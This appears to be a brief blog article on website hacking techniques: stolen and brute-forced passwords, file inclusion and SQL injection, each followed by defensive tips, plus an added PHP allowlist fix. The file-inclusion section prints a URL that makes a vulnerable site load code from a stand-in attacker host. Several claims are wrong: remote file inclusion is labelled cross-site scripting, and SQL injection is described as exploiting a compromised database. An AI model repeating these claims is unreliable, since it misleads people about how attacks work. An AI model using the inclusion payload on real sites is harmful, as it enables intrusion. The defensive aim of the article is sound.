Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – Bypass authentication

It’s the webmaster’s nightmare: hackers accessing the site using stolen passwords, which should be under the webmaster’s control. Usually the hackers are people well known to the webmaster. They use various techniques to steal the password: they access the webmaster’s email, or they use key loggers or network sniffers to capture the password the webmaster uses for day-to-day work.

Hackers can also use techniques such as brute-force attacks (dictionary attacks) to find weak passwords. The more complex the password, the more difficult it is for hackers to identify it using this method.

How to defend

  • It’s advised to make passwords out of capital letters, small letters, numbers and symbols, and they should be at least 6-10 characters long.
  • Change the passwords at frequent intervals
  • Don’t store the passwords in email
  • Use the latest antivirus software to make sure that the system is free of key loggers

XSS or the cross site scripting

In this method the hacker again gains access to your website, this time using a previously disclosed or undisclosed security vulnerability in the server software or the scripting language. Hackers try to execute code hosted on a remote computer and thereby access the secure areas of the website.

For example, in Apache/PHP, if you include a page like this:

include $_GET['page'];

and use a GET request to include aboutus.php like this: http://yoursite.php/?page=aboutus, then hackers can execute a remotely hosted page like this: http://yoursiite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest, and there are many variations of it, such as intercepting JavaScript to execute XSS attacks. Nowadays it’s very common, as webmasters move towards Web 2.0 techniques and use loosely coded AJAX techniques.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

  • Be aware of the XSS attacks happening around
  • Update the web server software and server scripting language
  • Disable unwanted service from server software
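
The include-from-request pattern shown above (usually called file inclusion), rewritten so the request value only selects from a fixed allowlist. This is an added example, not code from the original article; the page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based replacement for `include $_GET['page'];`.
// Page names, the pages/ directory and resolve_page() are hypothetical.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// The only accepted ?page= values; each maps to a fixed file name,
// so nothing taken from the request is ever used as a path or URL.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'aboutus' => 'aboutus.php',
    'contact' => 'contact.php',
];

/**
 * Map the requested page name to a file inside PAGE_DIR.
 * Returns null for anything that is not on the allowlist.
 */
function resolve_page($requested): ?string
{
    // Rejects arrays (?page[]=x), URLs, paths and unknown names alike.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }

    // Defence in depth: the resolved file must still live under PAGE_DIR
    // (guards against a symlink planted inside the pages directory).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

With allow_url_include left Off in php.ini, PHP refuses the http:// form of the request, but only an allowlist like this also keeps local files the site never meant to serve out of reach.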

SQL injection

In this type of attack, hackers take advantage of a compromised database. Hackers inject carefully written SQL code through the forms available on the website (registration, feedback form, etc.). Read more about this type of attack here:

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

  • Clean up the inputs before inserting them into the database
  • Properly escape input strings
